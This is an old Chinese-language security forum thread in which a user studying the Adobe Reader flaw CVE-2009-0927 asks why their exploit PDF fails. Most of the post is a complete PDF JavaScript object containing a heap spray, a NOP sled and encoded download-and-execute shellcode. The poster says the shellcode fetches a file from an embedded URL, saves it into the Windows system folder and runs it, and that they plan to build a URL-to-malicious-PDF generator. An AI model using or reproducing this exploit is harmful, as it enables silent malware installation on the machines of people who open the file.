首页
社区
课程
招聘
[旧帖] 学习cve-2009-0927时遇到问题 0.00雪花
发表于: 2011-12-3 12:35 4926

[旧帖] 学习cve-2009-0927时遇到问题 0.00雪花

2011-12-3 12:35
4926
学习0day书上cve-2009-0927(最好使用包括adobe reader 9.0以前版本测试)时想把其中的shellcode换成metasploit里的一个download&exec的shellcode
于是把第7个对象的javascript代码改写成如下代码:
7 0 obj
<<
/Type /Action
/S /JavaScript
/JS (

var shellcode = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a99%u8a5f%udfcf%ua719%uec19%u1963%u19af%u1ac7%ub975%u4512%ub9f3%u66ca%u75ce%u9d5e%uc59a%ub7f8%u5efc%u9add%ue19d%u99fc%uaa99%uc959%ucac9%uc9cf%uce66%u1265%uc945%u66ca%u69ce%u66c9%u6dce%u59aa%u1c35%uec59%uc860%ucfcb%u66ca%uc34b%u32c0%u777b%u59aa%u715a%u66bf%u6666%ufcde%uc9ed%uf6eb%ud8fa%ufdfd%ufceb%ueaea%ude99%uedfc%ue0ca%uedea%uf4fc%uf0dd%ufceb%uedfa%uebf6%ud8e0%uce99%uf7f0%ue1dc%ufafc%udc99%uf0e1%ucded%uebf1%uf8fc%u99fd%uf6d5%ufdf8%uf0d5%uebfb%uebf8%ud8e0%uec99%uf5eb%uf6f4%u99f7%ucbcc%uddd5%ueef6%uf5f7%uf8f6%ucdfd%udff6%uf5f0%ud8fc%u7799%u7777%u702e%u706f%u6f62%u6b6f%u632e%u6d6f%u732f%u6e61%u7567%u2f6f%u6773%u3230%u2e33%u7874%u8074%u8080");
var nops = unescape("%u9090%u9090");
while (nops.length <= 0x100000/2)
  nops += nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
var memory = new Array();
for (var i=0;i<200;i++)
memory[i] = nops+shellcode;
var str = unescape("%0c%0c%0c%0c");
while(str.length < 0x6000)
  str += str;
app.doc.Collab.getIcon(str+'aaaaD.a');

)
>>
endobj

可参见1.pdf,shellcode的功能是下载一个txt文件,存为c:\windows\system32\a.exe并执行它,但是运行了1.pdf以后c:\windows\system32下并没有生成a.exe,说明shellcode没有成功运行~而如果把shellcode替换成原来的弹出MessageBox的代码效果却很好。
用od调试,总会在一个异常函数处断下,然后就是好多int3调试不下去了。
哪位大神可以帮忙看看,如何才能让这段新的shellcode成功由1.pdf触发执行?谢谢!

PS:为方便大家调试shellcode,附上exec.c,功能是下载一个计算器下载程序ww1138.exe,并执行它(url的位置在shellcode的最后面),与pdf中使用的shellcode是一样的,并且单独这段shellcode的测试是成功的。

还有metasploit里面对于cve-2009-0927的exploit还是蛮成功的,但我还是想按照1.pdf的方法搞出来,因为我想自己写一个生成器(输入url,生成一个poc.pdf),metasploit生成的pdf文件我看不懂,不知道怎么直接按照它的方法生成相应的pdf文件。
多谢了!

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

上传的附件:
收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 238
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
pdx
2
另外,1.pdf是由附件中的生成器生成的(gen.cpp)
上传的附件:
2011-12-3 13:45
0
雪    币: 238
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
pdx
3
追加悬赏金了,哪位大哥能帮忙看一下~
2011-12-4 11:38
0
雪    币: 238
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
pdx
4
通过自己的努力,已经解决了问题,请问有办法能结束这个帖子吗?
2011-12-4 15:28
0
雪    币: 146
活跃值: (182)
能力值: ( LV13,RANK:220 )
在线值:
发帖
回帖
粉丝
5
么办法.....
2011-12-4 19:42
0
游客
登录 | 注册 方可回帖
返回
//